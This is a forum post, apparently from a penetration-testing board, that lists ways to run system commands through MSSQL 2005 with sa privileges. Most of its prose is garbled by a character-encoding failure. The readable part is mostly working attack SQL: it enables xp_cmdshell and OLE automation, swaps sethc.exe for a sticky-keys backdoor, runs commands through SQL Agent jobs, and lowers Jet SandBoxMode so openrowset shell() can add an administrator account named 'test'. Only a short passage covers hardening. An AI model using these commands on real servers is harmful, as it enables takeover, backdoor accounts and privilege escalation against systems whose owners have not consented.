��̳ › ������͸����::��Network penetration testing�� › MSsql2005(Sa)Ȩ��ִ�������ܽ�

admin ������ 2012-9-13 17:18:27

MSsql2005(Sa)Ȩ��ִ�������ܽ�

һ��xp_cmdshell

EXEC master..xp_cmdshell 'ipconfig'

����xp_cmdshell:

-- To allow advanced options to be changed.

EXEC sp_configure 'show advanced options', 1

GO

-- To update the currently configured value for advanced options.

RECONFIGURE

GO

-- To enable the feature.

EXEC sp_configure 'xp_cmdshell', 1

GO

-- To update the currently configured value for this feature.

RECONFIGURE

GO

����sp_oacreate

����wscript.shell����

use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c "net user" > c:\test.tmp'

����scripting.filesystemobject����

declare @o int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int

exec sp_oacreate 'scripting.filesystemobject', @oo out               exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

������utilman.exe����sethc.exe�ﵽͬ����Ч�����źܿ��𣬺Ǻ�

����Shell.Application����

declare @o int

exec sp_oacreate 'Shell.Application', @o out

exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user >c:\test.txt','c:\windows\system32','',1;

����OLE Automation Procedures

sp_configure 'show advanced options', 1;

GO

RECONFIGURE;

GO

sp_configure 'Ole Automation Procedures', 1;

GO

RECONFIGURE;

GO

���ǵĶԲ߾��ǰѶ�����һ���ֽ�

WScript.Shell���Ե���ϵͳ�ں�����DOS��������

����ͨ���޸�ע����������������������ֹΣ����

HKEY_CLASSES_ROOT\WScript.Shell\

��HKEY_CLASSES_ROOT\WScript.Shell.1\

����Ϊ���������֣��磺��ΪWScript.Shell_ChangeName��WScript.Shell.1_ChangeName

�Լ��Ժ���õ�ʱ��ʹ������Ϳ����������ô������

ҲҪ��clsidֵҲ��һ��

HKEY_CLASSES_ROOT\WScript.Shell\CLSID\��Ŀ��ֵ

HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID\��Ŀ��ֵ

ͬwscript.shell����scripting.filesystemobject��Shell.Application

����JOB

����JOBִ�������һ���Ⱦ��������ǿ���SQLSERVERAGENT��������������Կ���

exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

use msdb create table (resulttxt nvarchar(1024) null) exec sp_delete_job null,'x' exec sp_add_job 'x' exec

sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c "net user>c:\test.test"' exec sp_add_jobserver

null,'x',@@servername exec sp_start_job 'x';

�ģ�SandBoxMode�����ϳ�˵��ɳ��ģʽ��

ԭ������access�����VBS��shell��������systemȨ��ִ���κ�������������������֮ǰ�����ע������һ����SandBoxmode�Ŀ��ش򿪣�

ע�����HKEY_LOCAL_MACHINE\SoFtWare\Micris

oft\Jet\4.0\Engine\SandBoxmode.Ĭ��ֵΪ2������˼�ֵΪ0��ʾʼ

�ս���SandBoxmodeģʽ��1��ʾ���ڷ�AcessӦ�ó�������SandBoxmodeģʽ��2��ʾ��accessӦ�ó���ʹ��SandBoxmodeģʽ��3���ʾ��ȫ������ȫ���á�//1��0������ִ������

EXEC sp_addlinkedserver 'testsql','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

EXEC master..xp_regreadHKEY_LOCAL_MACHINE ,'Software\Microsoft\Jet\4.0\engines','SandBoxMode'

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user test test /add")')

select * from openrowset('microsoft.jet.oledb.4.0',

';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")')

������ϵͳ�Դ�������mdb�ļ�

C:\WINDOWS\system32\ias\dnary.mdb
C:\WINDOWS\system32\ias\ias.mdb

�ܽ�

   �������ַ�������ϸ�����Ҷ������м����ˣ�����������Է�ɢ˼ά�����ҳ������֣�������Ĭ������²��Եģ�������͸��ʱ���кܶ��������������ǿ�����һ�˷�����������õ���������Ϣ����ȡ�������ļ��˵ȵȣ����ǻ���Ҫ��Ȩ��������������ε����Ⱑ��

��ע
      ����*.exec:\windows\system32\ ����c:\windows\system32\dllcache��
      ����cmd.exe����command.exe��
      ����net.exe����net1.exe��
      Mdb�ļ����������ǿ����ϴ�һ����
      ִ��������������ֻ��һ��Ŷ

�鿴�����汾: MSsql2005(Sa)Ȩ��ִ�������ܽ�